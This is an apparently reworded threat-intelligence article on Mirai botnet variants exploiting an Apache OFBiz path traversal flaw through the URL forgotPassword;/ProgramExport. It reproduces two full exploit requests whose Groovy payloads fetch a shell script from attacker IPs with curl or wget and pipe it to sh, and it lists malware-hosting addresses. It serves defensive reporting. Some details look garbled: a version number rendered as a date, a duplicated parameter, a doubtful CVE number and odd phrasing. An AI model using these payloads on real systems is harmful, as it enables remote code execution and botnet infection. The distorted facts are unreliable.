Enterprise resource planning (ERP) software is at the heart of many businesses supporting HR, accounting, shipping and manufacturing. These systems can become very complex and difficult to maintain. They are often highly customized, which can make it difficult to fix. However, critical vulnerabilities continue to affect these systems and put critical business data at risk.
SANS Internet Storm Center published a report showing how the open source ERP platform OFBiz is currently the target of new strains of the Mirai botnet.
As part of its broad portfolio of projects, the Apache Foundation supports OFBiz, a Java-based platform for building ERP (Enterprise Resource Planning) applications. Seems like OFBiz are much less common than commercial alternatives. However, like any other ERP system, organizations rely on it for sensitive business data, and the security of these ERP systems is critical.
In May of this year, a critical security update was released for OFBiz. The update fixed a directory traversal vulnerability that could lead to remote command execution. Versions of OFBiz prior to 12/18/13 were affected. A few weeks later, details about the vulnerability were promulgated.
Directory traversal or path traversal vulnerabilities can be used to bypass access control rules. For example, if a user can access the “/public” directory but not the “/admin” directory, an attacker could use a URL like “/public/../admin” to fool the access control logic. Recently the CISA and the FBI issued an alert as part of the Security by Design initiative, which focuses on directory traversal. CISA noted that they currently track 55 directory traversal vulnerabilities as part of the Known Exploited Vulnerabilities (KEV) directory.
For OFBiz, directory traversal is easily triggered by inserting a semicolon. All an attacker needs to find is a URL they can access and add a semicolon followed by the restricted URL. The URL of the exploit we are currently seeing is:
/webtools/control/forgotPassword;/ProgramExport
Since users should be able to recover passwords without first logging in, “forgotPassword” does not require any authentication. “ProgramExport”, on the other hand, should be access controlled and not accessible unless the user is logged in. “ProgramExport” is particularly dangerous because it allows arbitrary code execution. Incorrect logic in OFBiz stopped evaluating a URL after a semicolon. This allowed any user without logging in to access the second part of the URL, “/ProgramExport”.
An attacker must use a POST request to exploit the vulnerability, but does not necessarily need the body of the request. Instead, the URL parameter will work fine.
The SANS Internet Storm Center uses a wide net of decoys to detect attempts to exploit a wide range of web application vulnerabilities. Significant new exploit attempts are described in “Seen for the first time“. This weekend, these sensors detected a significant increase in attempts to exploit CVE-2024-32213, the OFBiz directory traversal vulnerability mentioned above, which was immediately spotted in the First Seen report.
The exploit attempts originated from two different IP addresses, which were also linked to different attempts to exploit IoT devices, commonly associated with modern variants of the “Mirai” botnet.
Attackers used two types of exploit. The first used a URL to include the command the exploit was supposed to execute:
POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh
The second used the request body for a command that is more common for “POST” requests:
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: (victim IP address)
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);
Unfortunately, neither the “bin.sh” script nor the “sh” script were recovered. The IP addresses were involved in a July 29 scan using the “KrebsOnSecurity” user agent, a tip for information blogger Brian Krebs. However, the crawled URLs were mostly parasitic, looking for existing web shells left behind by previous attacks. The IP address was also used to distribute a file called “botx.arm”. This filename is often associated with Mirai variants.
With the vulnerability announcement in May, we expected some scans to take advantage of the OFBiz vulnerability. The exploit was commonplace, and while the vulnerable and exposed population is small, it hasn’t stopped attackers in the past. But now they are at least experimenting and maybe adding bot vulnerabilities like the Mirai variants.
Only a few IP addresses are involved:
- 95.214.27.196: Sending an exploit as a URL parameter and hosting malware.
- 83.222.191.62: Sending the exploit as the request body. Malware located at 185.196.10.231. Earlier in July, this IP was scanned for IoT vulnerabilities.
- 185.196.10.231: hosting malware
If you found this article interesting and want to dive deeper into the world of web application, API, and microservices security, you can join me at Network Security 2024 (September 4-9) for my course, SEC522. See everything in store at the event here.
